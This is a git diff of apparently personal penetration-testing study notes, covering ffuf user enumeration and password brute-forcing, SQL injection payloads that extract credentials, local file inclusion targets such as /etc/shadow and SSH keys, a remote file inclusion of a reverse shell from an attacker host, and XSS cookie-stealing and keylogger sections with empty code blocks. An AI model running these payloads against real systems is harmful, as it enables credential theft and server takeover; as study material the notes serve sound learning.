diff --git a/enumeration/docs/ffuf.md b/enumeration/docs/ffuf.md index 42513a5..11e5e72 100644 --- a/enumeration/docs/ffuf.md +++ b/enumeration/docs/ffuf.md @@ -26,7 +26,15 @@ seq 0 255 | fuff -u 'http:///sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33 ```sh ffuf -u http:///sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded' ``` - +### Fuzz Users and use Bruteforce +* Fuzz users and write file +```sh +ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http:///customers/signup -mr "username already exists" -o fuff.out +``` +* Use users saved in `fuff.out` to bruteforce +```sh +ffuf -w userlist.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http:///customers/login -fc 200 +``` ### Fuzz Subdomains ```sh ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md index 65c9658..dc6e326 100644 --- a/exploit/sqli/sqli.md +++ b/exploit/sqli/sqli.md @@ -31,6 +31,16 @@ SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+ SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ ``` +* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char. +```sql +' UNION SELECT null,null,null where database() like 'da%';-- - +``` + +### Time based +* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes +```sql +' union select sleep(3), null; -- - +``` ### Blind injection // Guessing characters ```sh @@ -70,6 +80,14 @@ http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+ ' UNION SELECT NULL,username,password,NULL FROM users -- // ``` +* Retrieve content by union poking the count and order, afterwards extracting tables via +```sh +0 union select null, null, database() +0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db' +0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename' +0 union select null, null, group_concat(username, ':', password from found_tablename +``` + * [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection) ### Identify Database diff --git a/exploit/web/command_injection.md b/exploit/web/command_injection.md new file mode 100644 index 0000000..80fd02c --- /dev/null +++ b/exploit/web/command_injection.md @@ -0,0 +1,19 @@ +# Command Injection + +* Blind injection +* Verbose injection + +## Blind Injection +* Check via ping, open a `tcpdump` on ICMP to listen for packets +* Redirect to logfile and read +* Use `sleep` or `timeout` to check if ci is possible in general + +## Functions +* Watch out for + * `eval()` + * `exec()` + * `passthru()` + * `system()` + + + diff --git a/exploit/web/cookie_tampering.md b/exploit/web/cookie_tampering.md new file mode 100644 index 0000000..eab9f63 --- /dev/null +++ b/exploit/web/cookie_tampering.md @@ -0,0 +1 @@ +# Cookie Tampering diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md index 0d04667..3ca217c 100644 --- a/exploit/web/local_file_inclusion.md +++ b/exploit/web/local_file_inclusion.md @@ -36,3 +36,21 @@ curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=.php ``` +## Files of Interest +* `/etc/issue` +* `/etc/profile` +* `/proc/version` +* `/etc/passwd` +* `/etc/shadow` +* `/root/.bash_history` +* `/var/log/dmessage` +* `/var/mail/root` +* `/root/.ssh/id_rsa` +* `/var/log/apache2/access.log` +* `C:\boot.ini` + +## Tricks + +* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4 +* Terminate query with `/.` +* `..//..//..//file`, double slashes diff --git a/exploit/web/php/password_reset.md b/exploit/web/php/password_reset.md new file mode 100644 index 0000000..8cf9bc9 --- /dev/null +++ b/exploit/web/php/password_reset.md @@ -0,0 +1,4 @@ +# Password Reset + +* Using a password reset while inserting an email address via GET and POST method. +* `$_REQUEST` as an array favors POST over GET. So, sending the attacker email address via POST with the GET query parameter. diff --git a/exploit/web/remote_file_inclusion.md b/exploit/web/remote_file_inclusion.md new file mode 100644 index 0000000..6061860 --- /dev/null +++ b/exploit/web/remote_file_inclusion.md @@ -0,0 +1,9 @@ +# Remote File Inclusion + + +## Usage +* Use a GET query parameter to include an attacker URL. +```sh +https://test.com/files.php?file=http://:/reverse_shell.txt +``` +* Payload may be PHP for example, but should not end in executable file extensions. The payload is executed locally, otherwise. diff --git a/exploit/web/xss.md b/exploit/web/xss.md index 2713e77..c84a8ad 100644 --- a/exploit/web/xss.md +++ b/exploit/web/xss.md @@ -2,7 +2,12 @@ A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS. ## Stored XSS -This is where a malicious string originates from the websites database. +This is where a malicious string originates from the websites database. Such as (stored in a db) +* User profiles +* Chats and comments +* Part of link + +* Blind xss is stored inside the app but effects are only visible by proxy, [xsshunter](https://xsshunter.com/). ### Examples * Sanity test by changing DOM content @@ -12,13 +17,13 @@ This is where a malicious string originates from the websites database. * Cookie stealing -``` +```javascript ``` * Navigte to `/logs` and take sid * Open nc port and collect cookies -```sh +```javascript @@ -26,6 +31,8 @@ This is where a malicious string originates from the websites database. ## Reflected XSS In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload. +* URL parameters inside GET queries +* File paths ### Usage As script inside parameter @@ -36,6 +43,11 @@ http://example.com/search?keyword= ``` http://example.com/reflected?keyword= ``` +* Session stealing, base64 encoded +```javascript + +``` + * open netcat binder to catch the http queries ## DOM based XSS With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so: @@ -60,7 +72,7 @@ test" onmouseover="alert(document.cookie)" ``` or ```javascript -<script>alert("1")</script> +<script>alert("1");</script> ``` * `alert()` sanitizing ```javascript @@ -101,6 +113,16 @@ or  } ``` +* base64 encoded keylogger +```javascript + +``` +## Tricks and Tips +* Use Polyglots ## Protection Methods